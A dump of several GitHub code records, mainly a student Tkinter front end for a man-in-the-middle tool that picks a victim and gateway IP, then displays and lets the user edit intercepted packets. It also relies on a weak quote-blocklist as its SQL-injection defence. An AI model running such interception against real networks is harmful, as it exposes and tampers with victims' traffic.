final_list[0]\n return final_list\n\ndef avalable_ip_adresses():\n \"\"\"\n gets all the ip adresses in the network using arp -a in the cmd, then uses the helping functions to filter the ips\n which are attackable\n :return: a string with all the avalable ip adresses to attack\n \"\"\"\n global IP_LIST, GATEWAYIP\n ip_addresses = str(subprocess.check_output(\"cmd /c arp -a\", stderr=subprocess.STDOUT, shell=True))\n IP_LIST = re.findall(CMDIP_REGEX, ip_addresses)\n ip_subnet, GATEWAYIP = find_mask()\n IP_LIST.remove(GATEWAYIP)\n IP_LIST = clean_ip_list(IP_LIST, ip_subnet)\n IP_LIST.insert(0, \"Available ip addresses\")\n IP_LIST.append(\"\\ngateway ip: \\n\" + str(GATEWAYIP))\n return \"\\n\".join(IP_LIST)\n\nINVALID_LIST = [\"'\", \"username\", \"password\"]\nBG_COLOR1 = \"#4275A8\"\nIP_REGEX = \"^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$\"\nAVAILABLE_IPS = avalable_ip_adresses()\n\n\nclass ProjectGui:\n def __init__(self):\n self.root = Tk()\n self.my_canvas = Canvas(self.root, width=485, height=355, bd=0, highlightthickness=0)\n self.reg_button = Button(self.root, text=\"registry\", font=(\"Clibri\", 14), width=7, fg=\"black\", bg=\"#b29b8f\")\n self.log_button = Button(self.root, text=\"login\", font=(\"Clibri\", 14), width=7, fg=\"black\", bg=\"#b29b8f\",\n command=self.login_screen)\n self.back_button = Button(self.root, text=\"back\", font=(\"Clibri\", 10), width=5, fg=\"white\", bg=\"#2a3e5a\",\n command=self.login_registry_screen)\n self.un_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n self.pw_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n self.users = Users()\n self.login_btn = Button(self.root, text=\"login\", font=(\"Clibri\", 12), width=7, fg=\"white\", bg=\"#42536e\",\n command=self.handle_info_login)\n self.textid = 0\n self.start_btn = Button(self.root, text=\"start\", font=(\"Clibri\", 10), width=5, fg=\"white\", bg=\"white\",\n command=self.check_ip)\n self.victimip_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n self.gatewayip_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n self.lable1 = Label(self.root, text=\"Invalid input.\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.lable2 = Label(self.root, text=\"Invalid input.\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.lable3 = Label(self.root, text=\"Invalid input.\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.lable4 = Label(self.root, text=\"Invalid input.\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.lable5 = Label(self.root, text=\"Invalid input.\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.var = IntVar()\n self.var.set(1)\n self.read_b = Radiobutton(self.root, text=\"Read data\", font=(\"Clibri\", 20), variable=self.var, value=1)\n self.change_b = Radiobutton(self.root, text=\"Edit data\", font=(\"Clibri\", 20), variable=self.var, value=2)\n self.tree_frame = Frame(self.root)\n self.tree_scroll = Scrollbar(self.tree_frame)\n self.my_tree = ttk.Treeview(self.tree_frame, yscrollcommand=self.tree_scroll.set, selectmode=\"extended\")\n self.data_frame = LabelFrame(self.root, text=\"packet information\", fg=\"black\", bg=\"#75BFD7\")\n self.id_lable = Label(self.data_frame, text=\"Packet ID\", bg=\"#75BFD7\")\n self.button_frame = LabelFrame(self.root, text=\"Commands\", bg=\"#75BFD7\")\n\n\n def check_validation(self, pw, un):\n \"\"\"\n :param pw: password\n :param un: username\n :return: true (valid) if pw & un are 8 chars or more and are safe from sql injection\n \"\"\"\n for i in INVALID_LIST:\n if i in pw or i in un or len(pw)<8 or len(un)<8:\n return False\n return True\n\n\n def login_registry_screen(self):\n \"\"\"\n runs the first screen, in which you choose to register or log in\n \"\"\"\n self.my_canvas.destroy()\n\n self.root.geometry(\"485x355+480+200\")\n self.root.title(\"MITM entry screen\")\n icon = PhotoImage(file=r\"C:\\Users\\lirik\\Downloads\\icon.png\")\n self.root.iconphoto(False, icon)\n self.root.resizable(height=False, width=False)\n\n bg = ImageTk.PhotoImage(file=r\"C:\\Cyber\\hacker2.webp\")\n\n self.my_canvas = Canvas(self.root, width=485, height=355, bd=0, highlightthickness=0)\n self.my_canvas.pack(fill=\"both\", expand=True)\n self.my_canvas.create_image(0, 0, image=bg, anchor=\"nw\")\n\n self.reg_button = Button(self.root, text=\"registry\", font=(\"Clibri\", 14), width=7, fg=\"black\", bg=\"#b29b8f\",\n command=self.reg_screen)\n self.log_button = Button(self.root, text=\"login\", font=(\"Clibri\", 14), width=7, fg=\"black\", bg=\"#b29b8f\",\n command=self.login_screen)\n\n reg_button_window = self.my_canvas.create_window(195, 300, anchor=\"nw\", window=self.reg_button)\n log_button_window = self.my_canvas.create_window(195, 250, anchor=\"nw\", window=self.log_button)\n\n self.root.mainloop()\n try:\n if self.attacker:\n self.attacker.stop()\n self.attacker.sniffer.set_on('stop')\n exit(0)\n except AttributeError:\n exit(0)\n\n def entry_clear_un(self, e):\n \"\"\"\n clears the entry boxes in the first screen\n \"\"\"\n if self.un_entry.get() == \"username\" or self.pw_entry.get() == \"password\":\n self.un_entry.delete(0, END)\n self.pw_entry.delete(0, END)\n self.pw_entry.config(show=\"*\")\n\n def login_screen(self):\n \"\"\"\n opens the login screen and checks if the information is right. if so, opens the main screen\n \"\"\"\n self.reg_button.destroy()\n self.log_button.destroy()\n\n self.root.title(\"MITM login screen\")\n\n self.un_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n self.pw_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n\n self.un_entry.insert(0, \"username\")\n self.pw_entry.insert(0, \"password\")\n\n un_window = self.my_canvas.create_window(145, 240, anchor=\"nw\", window=self.un_entry)\n pw_window = self.my_canvas.create_window(145, 290, anchor=\"nw\", window=self.pw_entry)\n\n self.un_entry.bind(\"<Button-1>\", self.entry_clear_un)\n self.pw_entry.bind(\"<Button-1>\", self.entry_clear_un)\n\n self.root.bind('<Return>', self.handle_info_login)\n self.login_btn = Button(self.root, text=\"login\", font=(\"Clibri\", 12), width=7, fg=\"white\", bg=\"#42536e\",\n command=self.handle_info_login)\n self.back_button = Button(self.root, text=\"back\", font=(\"Clibri\", 10), width=5, fg=\"white\", bg=\"#2a3e5a\",\n command=self.login_registry_screen)\n\n log_button_window = self.my_canvas.create_window(380, 292, anchor=\"nw\", window=self.login_btn)\n back_button_window = self.my_canvas.create_window(10, 10, anchor=\"nw\", window=self.back_button)\n\n def handle_info_login(self, e=None):\n \"\"\"\n gets pw and un from login screen and chacks if the user exists. if so, opens the main screen.\n \"\"\"\n pw = str(self.pw_entry.get())\n un = str(self.un_entry.get())\n valid = self.check_validation(pw, un)\n if valid:\n ans = self.users.check_user(un, pw)\n if ans:\n self.ip_choosing_screen()\n elif not ans:\n self.my_canvas.delete(self.textid)\n self.textid = self.my_canvas.create_text(90, 100, text=\"Username or password are incorrect.\",\n font=(\"Clibri bald\", 12),\n fill=\"white\", width=160)\n # wrong password\n else:\n self.my_canvas.delete(self.textid)\n self.textid = self.my_canvas.create_text(90, 100, text=\"Invalid input\", font=(\"Clibri bald\", 12),\n fill=\"white\", width=160)\n\n def reg_screen(self):\n \"\"\"\n opens the registry screen and checks if the information is right.\n \"\"\"\n\n self.reg_button.destroy()\n self.log_button.destroy()\n\n self.root.title(\"MITM registry screen\")\n\n self.un_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n self.pw_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n\n self.un_entry.insert(0, \"username\")\n self.pw_entry.insert(0, \"password\")\n\n un_window = self.my_canvas.create_window(145, 240, anchor=\"nw\", window=self.un_entry)\n pw_window = self.my_canvas.create_window(145, 290, anchor=\"nw\", window=self.pw_entry)\n\n self.un_entry.bind(\"<Button-1>\", self.entry_clear_un)\n self.pw_entry.bind(\"<Button-1>\", self.entry_clear_un)\n\n self.root.bind('<Return>', self.conf_screen)\n self.log_button = Button(self.root, text=\"register\", font=(\"Clibri\", 12), width=7, fg=\"white\", bg=\"#42536e\",\n command=self.conf_screen)\n self.back_button = Button(self.root, text=\"back\", font=(\"Clibri\", 10), width=5, fg=\"white\", bg=\"#2a3e5a\",\n command=self.login_registry_screen)\n\n log_button_window = self.my_canvas.create_window(380, 292, anchor=\"nw\", window=self.log_button)\n back_button_window = self.my_canvas.create_window(10, 10, anchor=\"nw\", window=self.back_button)\n\n self.textid = self.my_canvas.create_text(90, 100,\n text=\"Welcome! please enter your desiered username and password (at least 8 chars). \"\n \"After the registry, log in.\", font=(\"Clibri bald\", 12),\n fill=\"white\",\n width=160)\n\n def conf_screen(self, e=None):\n \"\"\"\n gets the new pw and un the user inserted. checks if they are valid, or exsits. if so, it requiers them to fill\n again. otherwise, its inserting the new user to the db.\n :return:\n \"\"\"\n pw = str(self.pw_entry.get())\n un = str(self.un_entry.get())\n if not self.check_validation(pw,un):\n self.my_canvas.delete(self.textid)\n self.textid = self.my_canvas.create_text(90, 100, text=\"Invalid input\", font=(\"Clibri bald\", 12),\n fill=\"white\", width=160)\n elif self.users.insert_user(un, pw) == \"exists\":\n self.my_canvas.delete(self.textid)\n self.textid = self.my_canvas.create_text(90, 100, text=\"Invalid input\", font=(\"Clibri bald\", 12),\n fill=\"white\", width=160)\n else:\n self.my_canvas.delete(self.textid)\n self.un_entry.destroy()\n self.pw_entry.destroy()\n self.log_button.destroy()\n self.my_canvas.create_text(90, 100, text=\"Registry completed successfully! go back and log in. \",\n font=(\"Clibri bald\", 12), fill=\"white\", width=160)\n\n def ip_choosing_screen(self):\n \"\"\"\n opens a screen in which you can choose the attacked ip address\n \"\"\"\n self.my_canvas.destroy()\n self.tree_frame.destroy()\n self.data_frame.destroy()\n self.button_frame.destroy()\n\n self.root.geometry(\"900x500+290+150\")\n self.root.title(\"MITM main screen\")\n self.root.configure(bg=BG_COLOR1)\n icon = PhotoImage(file=r\"C:\\Users\\lirik\\Downloads\\icon.png\")\n self.root.iconphoto(False, icon)\n # self.root.resizable(height=True, width=True)\n\n self.start_btn = Button(self.root, text=\"start\", font=(\"Clibri\", 18), width=5, fg=\"black\", bg=\"white\",\n command=self.check_ip)\n self.root.bind('<Return>', self.check_ip)\n\n\n self.start_btn.pack()\n self.start_btn.place(relx=0.45, rely=0.8, anchor=\"nw\")\n\n self.victimip_entry = Entry(self.root, font=(\"Clibri\", 20), width=14, fg=\"black\", bg=\"white\", bd=0)\n self.gatewayip_entry = Entry(self.root, font=(\"Clibri\", 20), width=14, fg=\"black\", bg=\"white\", bd=0)\n\n self.victimip_entry.pack()\n self.gatewayip_entry.pack()\n self.victimip_entry.place(relx=0.45, rely=0.3, anchor=\"nw\")\n self.gatewayip_entry.place(relx=0.45, rely=0.5, anchor=\"nw\")\n\n self.lable1 = Label(self.root, text=\"Please enter victim's ip and gateway ip\", font=(\"Clibri\", 20),\n bg=BG_COLOR1)\n self.lable2 = Label(self.root, text=\"Victim ip\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.lable3 = Label(self.root, text=\"Gateway ip\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.lable4 = Label(self.root, text=AVAILABLE_IPS, font=(\"Clibri\", 12), bg=BG_COLOR1)\n\n self.lable2.place(relx=0.25, rely=0.3, anchor=\"nw\")\n self.lable3.place(relx=0.25, rely=0.5, anchor=\"nw\")\n self.lable1.place(relx=0.23, rely=0.1, anchor=\"nw\")\n self.lable4.place(relx=0.78, rely=0.18, anchor=\"nw\")\n\n def is_ip(self, addr):\n \"\"\"\n :param addr: ip address\n :return: if the address is ip or not\n \"\"\"\n if re.search(IP_REGEX, addr):\n return True\n else:\n return False\n\n def is_in_list(self, ip, lst):\n \"\"\"\n :param ip: ip address\n :param lst: avalable ip list\n :return: if it is in the list or not\n \"\"\"\n for i in lst:\n print(i)\n if ip == i:\n return True\n return False\n\n def check_ip(self, e=None):\n \"\"\"\n checks if the ip is avalable, if so it starts the attack\n :return: if invalid, prints a massage to the screen\n \"\"\"\n global VICTIM_IP\n VICTIM_IP = str(self.victimip_entry.get())\n gwip = str(self.gatewayip_entry.get())\n if self.is_ip(VICTIM_IP) and self.is_ip(gwip) and self.is_in_list(VICTIM_IP, IP_LIST) and gwip == GATEWAYIP:\n self.sniffing_screen()\n else:\n self.lable5 = Label(self.root, text=\"Invalid input.\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.lable5.place(relx=0.1, rely=0.4, anchor=\"nw\")\n\n def choose_action(self, value):\n if value == 1:\n self.sniffing_screen()\n elif value == 2:\n self.get_db_file()\n\n def action_screen(self):\n self.lable5.destroy()\n self.lable1.destroy()\n self.lable2.destroy()\n self.lable3.destroy()\n self.lable4.destroy()\n self.victimip_entry.destroy()\n self.gatewayip_entry.destroy()\n self.start_btn.destroy()\n\n self.read_b = Radiobutton(self.root, text=\"Read data\", font=(\"Clibri\", 20), variable=self.var, value=1, bg=BG_COLOR1)\n self.change_b = Radiobutton(self.root, text=\"Download current db\", font=(\"Clibri\", 20), variable=self.var, value=2, bg=BG_COLOR1)\n\n self.root.bind('<Return>', lambda e: self.choose_action(self.var.get()))\n self.start_btn = Button(self.root, text=\"start\", font=(\"Clibri\", 18), width=5, fg=\"black\", bg=\"white\",\n command=lambda: self.choose_action(self.var.get()))\n\n self.lable1 = Label(self.root, text=\"What would you like to do?\", font=(\"Clibri\", 20),\n bg=BG_COLOR1)\n\n self.lable1.place(relx=0.3, rely=0.1, anchor=\"nw\")\n self.read_b.place(relx=0.40, rely=0.3, anchor=\"nw\")\n self.change_b.place(relx=0.4, rely=0.5, anchor=\"nw\")\n self.start_btn.place(relx=0.42, rely=0.8, anchor=\"nw\")\n\n def get_db_file(self):\n pass\n\n def sniffing_screen(self):\n \"\"\"\n opens the main screen in which the user can watch and control the information\n \"\"\"\n self.root.geometry(\"1000x500+290+150\")\n self.lable1.destroy()\n self.read_b.destroy()\n self.change_b.destroy()\n self.start_btn.destroy()\n self.root.configure(bg=\"#75BFD7\")\n\n style = ttk.Style()\n style.theme_use('default')\n style.configure(\"Treeview\", background=\"D3D3D3\", foreground=\"white\", rowheight=25, fieldbackground= \"D3D3D3\")\n style.map(\"Treeview\", background=[('selected', \"#347083\")])\n\n self.tree_frame = Frame(self.root)\n self.tree_frame.pack(pady=10)\n self.tree_scroll = Scrollbar(self.tree_frame)\n self.tree_scroll.pack(side=RIGHT, fill=Y)\n\n self.my_tree = ttk.Treeview(self.tree_frame, yscrollcommand=self.tree_scroll.set, selectmode= \"extended\")\n self.my_tree.pack()\n\n self.tree_scroll.config(command= self.my_tree.yview())\n\n self.my_tree['columns'] = (\"packet id\", \"src ip\", \"dst ip\", \"request type\", \"request parameters\", \"data\", \"src port\"\n , \"dst port\")\n self.my_tree.column(\"#0\", width=0, stretch=NO)\n self.my_tree.column(\"packet id\", anchor=CENTER, width=100)\n self.my_tree.column(\"src ip\", anchor=W, width=120)\n self.my_tree.column(\"dst ip\", anchor=W, width=120)\n self.my_tree.column(\"request type\", anchor=W, width=120)\n self.my_tree.column(\"request parameters\", anchor=W, width=120)\n self.my_tree.column(\"data\", anchor=W, width=120)\n self.my_tree.column(\"src port\", anchor=W, width=120)\n self.my_tree.column(\"dst port\", anchor=W, width=120)\n\n self.my_tree.heading(\"#0\", text=\"\", anchor=W)\n self.my_tree.heading(\"packet id\", text=\"packet id\", anchor=CENTER)\n self.my_tree.heading(\"src ip\", text=\"src ip\", anchor=W)\n self.my_tree.heading(\"dst ip\", text=\"dst ip\", anchor=W)\n self.my_tree.heading(\"request type\", text=\"request type\", anchor=W)\n self.my_tree.heading(\"request parameters\", text=\"request parameters\", anchor=W)\n self.my_tree.heading(\"data\", text=\"data\", anchor=W)\n self.my_tree.heading(\"src port\", text=\"src port\", anchor=W)\n self.my_tree.heading(\"dst port\", text=\"dst port\", anchor=W)\n\n self.my_tree.tag_configure('oddrow', background=\"white\")\n self.my_tree.tag_configure('evenrow', background=\"lightblue\")\n self.my_tree.tag_configure('not sent', background=\"#25E0B0\")\n\n self.data_frame = LabelFrame(self.root, text = \"packet information\", fg=\"black\", bg=\"#75BFD7\")\n self.data_frame.pack(fill=\"x\", expand=\"yes\", padx=20)\n\n self.id_lable = Label(self.data_frame, text=\"Packet ID\", bg=\"#75BFD7\")\n self.id_lable.grid(row=0, column=0, padx=10, pady=10)\n self.id_entry = Entry(self.data_frame)\n self.id_entry.grid(row=0, column=1, padx=10, pady=10)\n\n self.srcip_lable = Label(self.data_frame, text=\"Src ip\",bg=\"#75BFD7\")\n self.srcip_lable.grid(row=0, column=2, padx=10, pady=10)\n self.srcip_entry = Entry(self.data_frame)\n self.srcip_entry.grid(row=0, column=3, padx=10, pady=10)\n\n self.dstip_lable = Label(self.data_frame, text=\"Dst ip\", bg=\"#75BFD7\")\n self.dstip_lable.grid(row=0, column=4, padx=10, pady=10)\n self.dstip_entry = Entry(self.data_frame)\n self.dstip_entry.grid(row=0, column=5, padx=10, pady=10)\n\n self.rt_lable = Label(self.data_frame, text=\"Request type\", bg=\"#75BFD7\")\n self.rt_lable.grid(row=0, column=6, padx=10, pady=10)\n self.rt_entry = Entry(self.data_frame)\n self.rt_entry.grid(row=0, column=7, padx=10, pady=10)\n\n self.rp_lable = Label(self.data_frame, text=\"Request parameters\", bg=\"#75BFD7\")\n self.rp_lable.grid(row=1, column=0, padx=10, pady=10)\n self.rp_entry = Entry(self.data_frame)\n self.rp_entry.grid(row=1, column=1, padx=10, pady=10)\n\n self.data_lable = Label(self.data_frame, text=\"data\", bg=\"#75BFD7\")\n self.data_lable.grid(row=1, column=2, padx=10, pady=10)\n self.data_entry = Entry(self.data_frame)\n self.data_entry.grid(row=1, column=3, padx=10, pady=10)\n\n self.sp_lable = Label(self.data_frame, text=\"Src port\", bg=\"#75BFD7\")\n self.sp_lable.grid(row=1, column=4, padx=10, pady=10)\n self.sp_entry = Entry(self.data_frame)\n self.sp_entry.grid(row=1, column=5, padx=10, pady=10)\n\n self.dp_lable = Label(self.data_frame, text=\"Dst port\", bg=\"#75BFD7\")\n self.dp_lable.grid(row=1, column=6, padx=10, pady=10)\n self.dp_entry = Entry(self.data_frame)\n self.dp_entry.grid(row=1, column=7, padx=10, pady=10)\n\n self.button_frame = LabelFrame(self.root, text=\"Commands\", bg=\"#75BFD7\")\n self.button_frame.pack(fill=\"x\", expand=\"yes\", padx=20)\n\n cont_button = Button(self.button_frame, text=\"continue\",bg=\"#67A6BB\", command= self.resume_send)\n cont_button.grid(row=0, column=1, padx=10, pady=10)\n\n stop_button = Button(self.button_frame, text=\"pause sennding packets\", bg=\"#67A6BB\", command= self.pause_packets)\n stop_button.grid(row=0, column=0, padx=10, pady=10)\n\n restore_button = Button(self.button_frame, text=\"stop attack\", bg=\"#67A6BB\", command=self.stop_attack)\n restore_button.grid(row=0, column=2, padx=10, pady=10)\n\n update_button = Button(self.button_frame, text=\"update\", bg=\"#67A6BB\", command= self.update_db)\n update_button.grid(row=0, column=3, padx=10, pady=10)\n\n startover_button = Button(self.button_frame, text=\"start over\", bg=\"#67A6BB\", command=self.startover)\n startover_button.grid(row=0, column=4, padx=10, pady=10)\n\n self.my_tree.bind(\"<ButtonRelease-1>\", self.selected_packet)\n\n self.count = 0\n print(\"real vip\" + str(VICTIM_IP))\n self.attacker = FinalRun(VICTIM_IP,GATEWAYIP, self.insert_to_table)\n self.attacker.start()\n\n def insert_to_table(self, info: Tuple[str, Tuple[str, ...]]):\n \"\"\"\n :param info: information about certain packet.\n the func prints the info on the table.\n the function is sent to the database object, so it prints every recived packet.\n \"\"\"\n if not self.attacker.sniffer.sendpac:\n # prints the stopped pacets in a different color\n self.my_tree.insert(parent='', index='end', iid=self.count, text='', values=info[1], tags=('not sent',))\n else:\n if self.count % 2 == 0:\n self.my_tree.insert(parent='', index='end', iid=self.count, text='', values=info[1], tags=('evenrow',))\n else:\n self.my_tree.insert(parent='', index='end', iid=self.count, text='', values=info[1], tags=('oddrow',))\n self.count += 1\n\n def selected_packet(self, e):\n \"\"\"\n recives the info from a selected packet and prints ut on the entry boxes\n \"\"\"\n\n self.id_entry.config(state=\"normal\")\n self.clear_table_entry()\n\n selected = self.my_tree.focus()\n val = self.my_tree.item(selected, 'values')\n\n self.id_entry.insert(0, val[0])\n self.id_entry.config(state=\"disabled\")\n\n self.srcip_entry.insert(0, val[1])\n self.dstip_entry.insert(0, val[2])\n self.rt_entry.insert(0, val[3])\n self.rp_entry.insert(0, val[4])\n self.data_entry.insert(0, val[5])\n self.sp_entry.insert(0, val[6])\n self.dp_entry.insert(0, val[7])\n\n def stop_attack(self):\n self.attacker.stop()\n\n def pause_packets(self):\n self.attacker.pause()\n\n def clear_table_entry(self):\n self.id_entry.delete(0, END)\n self.srcip_entry.delete(0, END)\n self.dstip_entry.delete(0, END)\n self.rt_entry.delete(0, END)\n self.rp_entry.delete(0, END)\n self.data_entry.delete(0, END)\n self.sp_entry.delete(0, END)\n self.dp_entry.delete(0, END)\n\n\n def update_db(self):\n \"\"\"\n updates the screen when packet information is updated, and sends it to the database.\n \"\"\"\n selected = self.my_tree.focus()\n self.my_tree.item(selected, values= (self.id_entry.get(), self.srcip_entry.get(), self.dstip_entry.get(),\n self.rt_entry.get(), self.rp_entry.get(),self.data_entry.get(),\n self.sp_entry.get(), self.dp_entry.get()))\n self.attacker.sniffer.update_pack(int(self.id_entry.get()), self.srcip_entry.get(), self.dstip_entry.get(),\n self.rt_entry.get(), self.rp_entry.get(),self.data_entry.get(),\n self.sp_entry.get(), self.dp_entry.get())\n self.clear_table_entry()\n\n def resume_send(self):\n self.attacker.resume()\n\n def exit(self):\n self.users.close()\n self.attacker.stop()\n\n def startover(self):\n self.stop_attack()\n self.ip_choosing_screen()\n\n\nif __name__ == '__main__':\n x = ProjectGui()\n x.login_registry_screen()\n print(\"exiting\")\n exit(0)","repo_name":"lirikeret/cyber_project","sub_path":"gui/project_gui.py","file_name":"project_gui.py","file_ext":"py","file_size_in_byte":26998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34645853128","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.urls import reverse\n\nfrom .models import Review\n\nclass ReviewTests(TestCase):\n def setUp(self):\n self.user = get_user_model().objects.create_user(\n username='reviewuser', email=\"tester@email.com\", password=\"pass\"\n )\n self.review = Review.objects.create(\n name='Darth Vader', author=self.user, review='The review is strong with this one'\n )\n \n def test_string_representation(self):\n review = Review(name='Darth Vader')\n self.assertEqual(str(review), review.name)\n \n def test_review_content(self):\n self.assertEqual(f'{self.review.name}', 'Darth Vader')\n self.asserEqual(f'{self.review.author}', 'reviewuser')\n self.assertEqual(f'{self.review.review}', 'The review is strong with this one')\n \n def test_review_list_view(self):\n response = self.client.get(reverse('review_list'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'Darth Vader')\n self.assertTemplateUsed(response, 'reviews-list.html')\n \n ","repo_name":"DanRQuinn/want-to-go","sub_path":"reviews/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3518060830","text":"# Coberturas de pizza: escriba un bucle que solicite al usuario que ingrese \n# una serie de coberturas de pizza hasta que ingrese un valor de 'salir'. A \n# medida que ingresan cada ingrediente, imprima un mensaje que diga que \n# agregará ese ingrediente a su pizza.\n\nprint(\"*** Has tu pizza ***\")\ningrediente = \"\"\nwhile ingrediente != \"salir\":\n ingrediente = input(\"¿Qué ingrediente desea agregar? \")\n if ingrediente != \"salir\":\n print(f\"Agregando... {ingrediente} a la pizza.\")\n\nprint(\"\\n¡Marcha una pizza loca!\")\n\n# Entradas de cine: una sala de cine cobra diferentes precios de entradas \n# según la edad de la persona. Si una persona es menor de 3 años, la entrada \n# es gratuita; si tienen entre 3 y 12, el boleto es de $ 10; y si son mayores \n# de 12 años, el boleto cuesta $ 15. Escriba un bucle en el que pregunte a los \n# usuarios su edad y luego dígales el costo de la entrada al cine.\n\nedad = 1\nwhile edad != 0:\n edad = int(input(\"¿Qué edad tienes? [0 = salir] \"))\n if 1 <= edad < 3:\n print(\"Tu entras gratis.\")\n elif 3 <= edad <= 12:\n print(\"Tu entrada cuesta $ 10.\")\n elif edad > 12:\n print(\"Tu entrada cuesta $ 15.\")\n\n# Tres salidas: escriba diferentes versiones del ejercicio anterior que realicen \n# cada una de las siguientes acciones al menos una vez:\n# • Utilice una prueba condicional en la instrucción while para detener el \n# ciclo.\n# • Utilice una variable activa para controlar la duración del ciclo.\n# • Utilice una declaración de interrupción para salir del ciclo cuando el \n# usuario ingrese un valor de 'salir'.\n\n# Infinito: escribe un bucle que nunca termine y ejecútalo. (Para finalizar el \n# ciclo, presione ctrl-C o cierre la ventana que muestra la salida).\nnumero = 0\nwhile True:\n numero += 1\n print(f\"{numero} - ¡Este bucle nunca acaba!\")","repo_name":"agustincomolli/Python","sub_path":"Python Crash Course/20-ejercicios_while-1.py","file_name":"20-ejercicios_while-1.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28023602720","text":"\nimport requests\n\nimage_url = \"https://prove.dk/storage/app/book/TheoryBook_FirstAid_ed2_2014_en/files/mobile/[NUM].jpg\"\nnum_from = 1\nnum_to = 220\n\nfor count in range(num_from, num_to+1):\n url_to_download = image_url.replace(\"[NUM]\", str(count))\n img_data = requests.get(url_to_download).content\n with open(f\"{count}.jpg\", 'wb') as handler:\n handler.write(img_data)\n\n","repo_name":"ohare93/Python-Mini-Projects","sub_path":"MiniWebsiteScrapers/ImagesFromUrl.py","file_name":"ImagesFromUrl.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31133038198","text":"import boto3\nimport sys\n\ndef scan_region(region_name, profile):\n\n try:\n char_len = len(region_name) + 12\n print(\"\\nChecking in {}\".format(region_name))\n print(\"*\" * char_len)\n ec2 = boto3.client('ec2', region_name=region_name)\n\n response = ec2.describe_vpcs(\n Filters=[\n {\n 'Name': 'isDefault',\n 'Values': ['true']\n }\n ]\n )\n\n if len(response['Vpcs']) is 0:\n print(\"No default VPC found in {}\".format(region_name))\n else:\n vpc_id = response['Vpcs'][0]['VpcId']\n print(\"Default {0} found in {1}\".format(vpc_id, region_name))\n\n del_subnet(vpc_id, ec2)\n del_igw(vpc_id, ec2)\n del_vpc(vpc_id, ec2)\n\n except Exception as e:\n profiles = boto3.Session().available_profiles\n print(\"{}. The profiles you have available are:\".format(e))\n print(\" \".join(str(item) for item in profiles))\n\n\ndef del_subnet(vpc_id, ec2):\n\n response = ec2.describe_subnets(\n Filters=[\n {\n 'Name': 'vpc-id',\n 'Values': [vpc_id]\n }\n ]\n )\n\n for subnet in response['Subnets']:\n data = ec2.delete_subnet(SubnetId=subnet['SubnetId'])\n print(\"{0} found in {1} in {2}.... subnet removed !!\".format(subnet['SubnetId'], vpc_id, region_name))\n\n\ndef del_igw(vpc_id, ec2):\n\n response = ec2.describe_internet_gateways(\n Filters=[\n {\n 'Name': 'attachment.vpc-id',\n 'Values': [vpc_id]\n }\n ]\n )\n\n if len(response['InternetGateways']) is 0:\n print(\"No IGW found attached to {}\".format(vpc_id))\n else:\n igw_id = response['InternetGateways'][0]['InternetGatewayId']\n\n data = ec2.detach_internet_gateway(\n InternetGatewayId=igw_id,\n VpcId=vpc_id\n )\n\n data = ec2.delete_internet_gateway(\n InternetGatewayId=igw_id\n )\n\n print(\"{} found and removed !!\".format(response['InternetGateways'][0]['InternetGatewayId']))\n\n\ndef del_vpc(vpc_id, ec2):\n\n response = ec2.delete_vpc(\n VpcId=vpc_id\n )\n\n print(\"Default VPC removed in {}\".format(region_name))\n\n\ntry:\n profile = sys.argv[1]\n boto3.setup_default_session(profile_name=profile)\n ec2 = boto3.client('ec2')\n regions = ec2.describe_regions()\n\n for region in regions['Regions']:\n scan_region(region['RegionName'], profile)\n\nexcept Exception as e:\n profiles = boto3.Session().available_profiles\n print(\"{}. The profiles you have available are:\".format(e))\n print(\" \".join(str(item) for item in profiles))\n","repo_name":"ibanmarco/del_default_vpcs","sub_path":"del_default_vpc.py","file_name":"del_default_vpc.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20453915737","text":"import pygame\nfrom pygame.locals import *\nfrom Missile import *\n# Player class\n\n\nclass Player():\n\n def __init__(self, window, windowWidth, windowHeight):\n self.window = window\n self.windowWidth = windowWidth\n self.windowHeight = windowHeight\n self.missileList = []\n\n # pygame.draw.polygon(window, (0, 255, 0), [[25, 25], [0, 50], [50, 50]], 2)\n # building our triangle\n halfWindowWidth = self.windowWidth / 2\n p1 = ((halfWindowWidth - 25) + (halfWindowWidth + 25)) / 2\n #print(p1, windowHeight - 50)\n self.topPoint = [p1, windowHeight - 50]\n self.leftPoint = [halfWindowWidth - 25, windowHeight - 25]\n #print(halfWindowWidth - 25, windowHeight - 25)\n self.rightPoint = [halfWindowWidth + 25, windowHeight - 25]\n #print(halfWindowWidth + 25, windowHeight - 25)\n\n def 